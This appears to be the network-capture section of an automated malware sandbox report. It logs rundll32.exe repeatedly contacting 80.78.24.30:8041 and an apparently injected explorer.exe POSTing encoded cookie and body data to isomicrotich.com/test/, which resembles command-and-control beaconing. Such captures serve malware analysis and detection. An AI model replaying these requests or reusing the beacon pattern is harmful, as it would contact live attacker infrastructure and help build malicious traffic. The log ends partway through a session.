Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49718 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:10.733642101 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49719 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:11.383349895 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49724 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:14.683825970 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49725 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:16.325100899 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request
Oct 3, 2024 20:45:16.325757980 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request
Oct 3, 2024 20:45:16.327436924 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49731 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:35.495724916 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49732 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:36.353638887 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49735 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:44.004328012 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49736 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:44.625129938 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49738 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:46.338917017 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49739 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:47.073749065 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49743 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:51.703495979 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49744 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:52.371779919 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 49746 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:57.128494024 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.9 | 49747 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:45:57.771469116 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 49750 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:03.503974915 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 49751 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:04.133115053 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 49754 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:08.793349981 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 49755 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:09.430943012 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 49757 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:15.158838987 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 49758 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:15.787509918 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 49760 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:20.444628000 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 49761 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:21.075803041 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.9 | 49766 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:31.673386097 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.9 | 49767 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:32.333218098 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.9 | 49770 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:40.854662895 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.9 | 49771 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:41.495584011 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.9 | 49775 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:45.223495007 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.9 | 49776 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:45.869189978 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.9 | 49783 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:52.557792902 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.9 | 49785 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:53.300137043 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.9 | 49791 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:58.037760019 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.9 | 49792 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:46:58.992655993 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.9 | 49796 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:00.703573942 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.9 | 49797 | 80.78.24.30 | 8041 | 7656 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:47:01.349472046 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49773 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:42 UTC | 414 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: kALB+jBIcqFh9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: isomicrotich.com
Content-Length: 92
Cache-Control: no-cache
2024-10-03 18:46:42 UTC | 92 | OUT | Data Raw: 31 51 44 56 39 33 6c 49 59 36 59 33 35 2f 69 57 77 44 6f 53 6c 71 43 36 6b 4b 44 63 33 7a 4e 79 5a 51 78 76 35 61 52 59 74 4d 4e 45 34 73 65 48 50 58 31 65 71 44 62 71 4b 78 70 6f 48 76 7a 37 56 5a 4b 6d 4e 44 79 65 41 6a 70 44 4c 30 49 47 51 4a 7a 4e 57 52 56 48 7a 56 45 3d
Data Ascii: 1QDV93lIY6Y35/iWwDoSlqC6kKDc3zNyZQxv5aRYtMNE4seHPX1eqDbqKxpoHvz7VZKmNDyeAjpDL0IGQJzNWRVHzVE=
2024-10-03 18:46:43 UTC | 544 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 18:46:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KaJaOdhTKmwuEvzftJXbpJFtZQkHTpScnF7LTjl3nOjxJEdwN5A2UcNASJw4mbwwLVhOEZKrnpK0S2gQ50Rj%2Bd6A6ugqy6va3rdX%2FX7T%2BAfwUPlQ4Cia1iFGVBavs96YFKH%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ccf18b4d8e6c32c-EWR
2024-10-03 18:46:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49774 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:44 UTC | 413 | OUT | POST /test/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: kALB+jBIcqFg9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: isomicrotich.com
Content-Length: 0
Cache-Control: no-cache
2024-10-03 18:46:45 UTC | 540 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 18:46:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jW8A3z7ODSAkfrlJSwYmHCk0R1l2%2Br4CE7BOGfa2Nrl54orMMgozGktA74ZDeNwTyR7Z5LqiSEchieQbCeTsPXMMLyOy1MgaJm2WyqZe4hk1f4fIrtPd7XzZd%2Bh9CE32zN9v"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ccf18c33ea678e2-EWR
2024-10-03 18:46:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49777 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:46 UTC | 413 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFj9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-03 18:46:46 UTC | 546 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:46 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=phqn2rJenCKZ4CuDhwtRvWUvI%2FAWWDOgVogpFRgbe3IvhIVLZnGOIJGt%2Fl4yi1d6r7SqVFOj99QcdNhD%2Fdjma9QYYuO6Ti9c4yopN%2FArRV%2BWO7MqF6tLpEe5aVDhkujiZxkW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18ca7876437b-EWR
2024-10-03 18:46:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49779 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:47 UTC | 413 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFi9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-03 18:46:47 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:47 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qF0szR14smg5Uqz5%2F8H6kAGS1uoZzk%2BLkl7xD5fqYhP7zty%2BZwHLBnRFgwHs2Nlf9yOUcNr1y%2F%2BaqOo2ebpr3U9CBOElVKqkuxg2ETEErdI6QQMj9HAG62EuzlQP7NtsXXXW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18d0fa4843cd-EWR
2024-10-03 18:46:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49780 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:48 UTC | 413 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFl9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-03 18:46:48 UTC | 554 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:48 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t6iW93HsA9T6mdsYR%2F6M7zyZVqQJjZOm%2BXHR%2BKsbU8n2V58GrtddeheRp4IyQtJe1%2Fg1T%2F8yBHH5a8UMpKg%2BS6pFDvl%2F2rC7%2FJf7VaWGsEUgDn2ZKXBKkxHQy9VfBAedlG%2F5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18d79ebd8c15-EWR
2024-10-03 18:46:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49781 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:49 UTC | 413 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          Cookie: kALB+jBIcqFk9baN0mUbkry70/OBhk5mRFU21JMakoNox+6jMXYt3EruJX0/Q6nbDM69dmntVXFHGxw5Mv+gazRt6m8J8V5HlvSnbZj7VcafdIUgVDdwC7oIDkICEYh/XGEI4cB2/W15Ly0yIlhujkWa1Rtt5Jhlzhs+2vZKGkw9pM0f
                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                          Host: isomicrotich.com
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-03 18:46:49 UTC | 573 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 03 Oct 2024 18:46:49 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dn%2BcPhXc9yJkhVblHSVdQYFuK2W%2BZAsjWrix8PwC%2FoKWy4NbTNyIwWhEY9lKKKgdgRHv51%2B4N8qE%2B4%2FoEbn1H3oUMlNCLegraE0jYagXWaunsVQ3QVsxjExrIKmFp1LFtuS%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ccf18df5e4142d5-EWR
2024-10-03 18:46:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49782 | 188.114.96.3 | 443 | 3504 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
